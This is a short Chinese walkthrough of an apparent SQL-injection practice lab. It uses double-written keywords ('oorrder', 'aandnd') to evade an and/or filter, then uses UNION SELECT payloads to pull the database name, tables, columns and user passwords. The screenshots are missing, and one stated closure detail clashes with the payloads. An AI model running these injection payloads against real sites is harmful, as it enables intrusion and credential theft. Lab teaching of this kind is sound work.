1、判断闭合方式
输入语句
?id=1\
,返回页面如下:
\的后面是',所以闭合方式是;。
2、确定注入方式
我们发现该网站有回显点,所以我们使用union联合攻击。但是注意此关的难点是and和or被过滤。哪怕是一个单词里面有or和and也不行。
3、判断回显位
(1)我们先看有几个注入点
输入语句
?id=1' oorrder by 3--+
,返回页面如下:
所以一共有3个注入点。
(2)确定有几个回显点
输入语句
?id=-1' union select 12,23,45--+
,返回页面如下:
所以第二和第三个位置是回显点。
4、爆破数据库名、用户名、版本
输入语句
?id=-1' union select 12,concat(database(),user(),version()),11--+
,返回页面如下:
5、爆破数据表名
输入语句
?id=-1' union select 12,group_concat(table_name),11 from infoorrmation_schema.tables where table_schema=database()--+
,返回页面如下:
6、爆破列名
输入语句
?id=-1' union select 12,group_concat(column_name),11 from infoorrmation_schema.columns where table_schema=database() aandnd table_name='users'--+
,返回页面如下:
7、爆破字段内容
输入语句
?id=-1' union select 12,group_concat(concat(id,'-',username,'-',passwoorrd)),11 from users--+
,返回页面如下: